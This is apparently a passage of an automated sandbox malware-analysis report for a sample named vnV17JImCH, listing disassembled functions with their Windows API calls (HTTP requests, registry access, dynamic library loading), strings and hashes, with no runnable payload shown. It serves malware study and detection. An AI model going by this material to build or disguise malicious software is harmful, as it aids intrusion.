Part of subcall function 00EBFC86: _wcscpy.LIBCMT ref: 00EBFCA9

_memset.LIBCMT ref: 00F02B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F02BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F02C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F02C97

Strings

0, xrefs: 00F02B73

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: fafe654890fbb5066a41069a2175f68b42bfd3933350fbb07a7a6b81acdae010
Instruction ID: bb0b71677d6c2420a414240ccb7f022c0d3bbb107dd25969ae931d1532542aa5
Opcode Fuzzy Hash: fafe654890fbb5066a41069a2175f68b42bfd3933350fbb07a7a6b81acdae010
Instruction Fuzzy Hash: 7351C271A083009EE7A49E28D849A6FB7E8AF85334F14492DF895E71D1DB70CD44B762

Function 00EB3137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EB3277
_memmove.LIBCMT ref: 00EB3310
_free.LIBCMT ref: 00EB3336
_memmove.LIBCMT ref: 00EB33E9

Strings

3c, xrefs: 00EB3225
_, xrefs: 00EB3322

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _memmove$_free
String ID: 3c$_
API String ID: 2620147621-4099079164
Opcode ID: 95c0eda8c85faa4e6314f9d825e1a6f135e0035ee1ff841656d80ff2d1c81d70
Instruction ID: bd1ae342ddee08f0564867051499e8cbe4a1212d1b765fdfdd2976317d72757f
Opcode Fuzzy Hash: 95c0eda8c85faa4e6314f9d825e1a6f135e0035ee1ff841656d80ff2d1c81d70
Instruction Fuzzy Hash: A0515B716043418FDB25CF28C951BAFBBE5EF85314F48582DE999A7361EB31E901CB82

Function 00EB6192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EB6248
_memmove.LIBCMT ref: 00EB62E4
_memset.LIBCMT ref: 00EB6308

Strings

3c, xrefs: 00EB62AF
ERCP, xrefs: 00EB61B3

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _memset$_memmove
String ID: 3c$ERCP
API String ID: 2532777613-1756721700
Opcode ID: a148d22e7781818ce7bdb5abcf9089b94580066089273ef70177496c5d837f8a
Instruction ID: 39c648a853a6fa67c5fa24d58cf9d6494934bd126677d448e0cf8ccb07888c62
Opcode Fuzzy Hash: a148d22e7781818ce7bdb5abcf9089b94580066089273ef70177496c5d837f8a
Instruction Fuzzy Hash: 4A51A071900309DBDB24CFA5C941BEBBBF4EF44318F20556EE94AEB251E775AA44CB40

Function 00EFD56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00EFD5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00EFD60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00EFD61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00EFD69D

Strings

DllGetClassObject, xrefs: 00EFD610

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 8845cb2c3e4dc7c2cdfea28f03dbd56564242ad14ffdd607e2dc707e1e5f44ee
Instruction ID: 363ca5a62d5944a9c98e5f942c6aaba1bffe6b82b94282ac7b6102d4056ab157
Opcode Fuzzy Hash: 8845cb2c3e4dc7c2cdfea28f03dbd56564242ad14ffdd607e2dc707e1e5f44ee
Instruction Fuzzy Hash: 3341A3B1604208EFDB15DF14CC84AAA7FBAEF44314F1290A9AE09EF205D7B1DD44DBA0

Function 00F02753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F027C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F027DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00F02822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F65890,00000000), ref: 00F0286B

Strings

0, xrefs: 00F027B5

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 16b84120010b72df850b90a5c69a6f301432384c7abe830faa850c6ff39ba625
Instruction ID: ea9eddf34c23ac662bf26209a7c90635dfcafdc05515ad9dc4c8de24f9748ad4
Opcode Fuzzy Hash: 16b84120010b72df850b90a5c69a6f301432384c7abe830faa850c6ff39ba625
Instruction Fuzzy Hash: C641B1756043019FDB60DF24CC49B1ABBE8EF85324F04892EF9A5972D1D734E805EB62

Function 00F1D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F1D7C5

Part of subcall function 00EA784B: _memmove.LIBCMT ref: 00EA7899

Strings

winapi, xrefs: 00F1D836
cdecl, xrefs: 00F1D81C
stdcall, xrefs: 00F1D847
none, xrefs: 00F1D8A0

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 879cb4f5bf157447f1a0844a4d3ac09004123b7fa0a9072e5403d9e7329e7b69
Instruction ID: 484dfeb6baa363c091ac8bececa9fe17f379e797a5f09beabc5ee2b9b8b02951
Opcode Fuzzy Hash: 879cb4f5bf157447f1a0844a4d3ac09004123b7fa0a9072e5403d9e7329e7b69
Instruction Fuzzy Hash: 8E318D71904219EBCF04EF58CC519EEB3F5FF05320B108629E865AB6D1DB71A945DB80

Function 00EF8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA7DE1: _memmove.LIBCMT ref: 00EA7E22

Part of subcall function 00EFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00EFAABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00EF8F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00EF8F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00EF8F57

Part of subcall function 00EA7BCC: _memmove.LIBCMT ref: 00EA7C06

Strings

ListBox, xrefs: 00EF8ED3
ComboBox, xrefs: 00EF8E9E

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: bf774ca4ae555fa71698cb5bea752e71fb3c2905487e8c5959f0592191022c67
Instruction ID: 3fe57b90e3ffade13f929a501d83ab49468b23221b8fe658489ba99937aa6184
Opcode Fuzzy Hash: bf774ca4ae555fa71698cb5bea752e71fb3c2905487e8c5959f0592191022c67
Instruction Fuzzy Hash: E821F272A0010CBEDB14ABA09C45DFFBBB9DF4A360B145129F925BB1E0DB39590A9620

Function 00F1182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F1184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F11872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F118A2
InternetCloseHandle.WININET(00000000), ref: 00F118E9

Part of subcall function 00F12483: GetLastError.KERNEL32(?,?,00F11817,00000000,00000000,00000001), ref: 00F12498
Part of subcall function 00F12483: SetEvent.KERNEL32(?,?,00F11817,00000000,00000000,00000001), ref: 00F124AD

Strings

, xrefs: 00F11893

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 0f64462cdecb1a8beff333c97e7b7f828e41eebca90877ec4c98e73d3f26ad21
Instruction ID: 89975988540921a2413aeba3eb258ad3df812cb1c6d124ed5c1eacc59319bbd8
Opcode Fuzzy Hash: 0f64462cdecb1a8beff333c97e7b7f828e41eebca90877ec4c98e73d3f26ad21
Instruction Fuzzy Hash: A221AFB150020CBFEB119F648C85EFF76EDFB48764F10812AF505A6140DA248D49B7A1

Function 00F263E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EA1D73
Part of subcall function 00EA1D35: GetStockObject.GDI32(00000011), ref: 00EA1D87
Part of subcall function 00EA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EA1D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F26461
LoadLibraryW.KERNEL32(?), ref: 00F26468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F2647D
DestroyWindow.USER32(?), ref: 00F26485

Strings

SysAnimate32, xrefs: 00F2643C

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: c83237b7cbdce091dfaaae36b8bbd8cf0714ee04357c41ef93c6b734e813a609
Instruction ID: c98cc186089d1896b4d5e1847d844939b7f73a5f2ff1e20e52fcece94d181c9f
Opcode Fuzzy Hash: c83237b7cbdce091dfaaae36b8bbd8cf0714ee04357c41ef93c6b734e813a609
Instruction Fuzzy Hash: 93218B71610229BBEF10AF64EC80EBA37A9EB59738F104629FA90D6190D771DC41B760

Function 00F06D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00F06DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F06DEF
GetStdHandle.KERNEL32(0000000C), ref: 00F06E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F06E3B

Strings

nul, xrefs: 00F06E36

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: aa0f67c890e6845fb987b500ae7d4ee9c6c237193b11456cd75c1a9ff440cd16
Instruction ID: 857e6c1884eafde7903f3e2619639a3c8994f49a647cd5ab5aa4e2b3198e4d8d
Opcode Fuzzy Hash: aa0f67c890e6845fb987b500ae7d4ee9c6c237193b11456cd75c1a9ff440cd16
Instruction Fuzzy Hash: 5A21B075A0030AABDB209F29DC05A9A7BF4EF45730F204A29FCA0D72D0DB709865BB54

Function 00F06E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00F06E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F06EBB
GetStdHandle.KERNEL32(000000F6), ref: 00F06ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00F06F06

Strings

nul, xrefs: 00F06F01

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: b1407352e92133202269511a4e3250ae4da1674cfd690859bfed161987ebf339
Instruction ID: e9eb3906a58aea7f934fff4f8b92d26cacb6ab465e5f693840919bd3bc87551e
Opcode Fuzzy Hash: b1407352e92133202269511a4e3250ae4da1674cfd690859bfed161987ebf339
Instruction Fuzzy Hash: 1421B3799003099BDB209F69DC04A9A77F8EF45730F204A29FCA0D72D0D770A865FB65

Function 00F0AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F0AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F0ACA8
__swprintf.LIBCMT ref: 00F0ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,00F2F910), ref: 00F0ACFF

Strings

%lu, xrefs: 00F0ACBB

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 7e48cbb1456d2bebd6853702130605a5b3e6138cb70bc6e2f404c33c756c19ba
Instruction ID: 8de82132c974ff6e3ba262b49599187d7da23c6ba818c66b86a52efd1461ad5d
Opcode Fuzzy Hash: 7e48cbb1456d2bebd6853702130605a5b3e6138cb70bc6e2f404c33c756c19ba
Instruction Fuzzy Hash: 91214F31A00209AFCB10DF65CD45EAE7BF8EF89714B0044A9F909AB252DB71EA45DB61

Function 00F01AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00F01B19

Strings

REMOVE, xrefs: 00F01B1F
EXISTS, xrefs: 00F01B41
KEYS, xrefs: 00F01B30
APPEND, xrefs: 00F01B52

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 639f22479485ac065093ebdb6225926f676d5d8f729defc8180283d16826d06e
Instruction ID: 389af58b26a123ef95b9da9c664ae7436c9a110310de06893c38a1af5b9ec90d
Opcode Fuzzy Hash: 639f22479485ac065093ebdb6225926f676d5d8f729defc8180283d16826d06e
Instruction Fuzzy Hash: DE113C719102088BCF00EF54D9519AEB7B4FF66318F148469D82467292EB32590AEB50

Function 00F1EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F1EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F1EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F1ED6A
CloseHandle.KERNEL32(?), ref: 00F1EDEB

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 6de43028184abb25b8cf3fec23d820dfb1c52241a14d799d9b58d036acd9526b
Instruction ID: 27ff03a967bbe3861b0e3edb89c15273faff3a59578e136c20d7977b51e94716
Opcode Fuzzy Hash: 6de43028184abb25b8cf3fec23d820dfb1c52241a14d799d9b58d036acd9526b
Instruction Fuzzy Hash: 55818571A043009FD724EF28D886F6AB7E5AF49720F14881DF999EB2D2D774AC41CB52

Function 00F20037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA7DE1: _memmove.LIBCMT ref: 00EA7E22

Part of subcall function 00F20E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F1FDAD,?,?), ref: 00F20E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F200FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F2013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F20183
RegCloseKey.ADVAPI32(?,?), ref: 00F201AF
RegCloseKey.ADVAPI32(00000000), ref: 00F201BC

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: a157a76cd8eff9e7f1829931c98e094a6526dee6cc5e0b1b5e609a0b2d544d56
Instruction ID: ae774e795e1fd650be725c2cb9ac169559110762716541d4e3d6a7676e884109
Opcode Fuzzy Hash: a157a76cd8eff9e7f1829931c98e094a6526dee6cc5e0b1b5e609a0b2d544d56
Instruction Fuzzy Hash: D0516672608204AFC714EF68DC81F6AB7E9FF88314F00492DF5959B2A2DB31E905DB52

Function 00F1D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA9837: __itow.LIBCMT ref: 00EA9862
Part of subcall function 00EA9837: __swprintf.LIBCMT ref: 00EA98AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F1D927
GetProcAddress.KERNEL32(00000000,?), ref: 00F1D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 00F1D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 00F1DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F1DA21

Part of subcall function 00EA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F07896,?,?,00000000), ref: 00EA5A2C
Part of subcall function 00EA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F07896,?,?,00000000,?,?), ref: 00EA5A50

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 2776a5af956b5dadaf4ccfbfea07a1732b8ba65553d984bdcaa6ac27ce2abc7b
Instruction ID: d6a308df5a9c8784459a32370fecf5c97abe6f73d03e7dcd7b1274c24c3d3b64
Opcode Fuzzy Hash: 2776a5af956b5dadaf4ccfbfea07a1732b8ba65553d984bdcaa6ac27ce2abc7b
Instruction Fuzzy Hash: 8B511636A00609DFCB00EFA8C4849AEB7F5FF0D320B558069E855AB312D735AD85DF91

Function 00F0E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F0E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00F0E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F0E687

Part of subcall function 00EA9837: __itow.LIBCMT ref: 00EA9862
Part of subcall function 00EA9837: __swprintf.LIBCMT ref: 00EA98AC

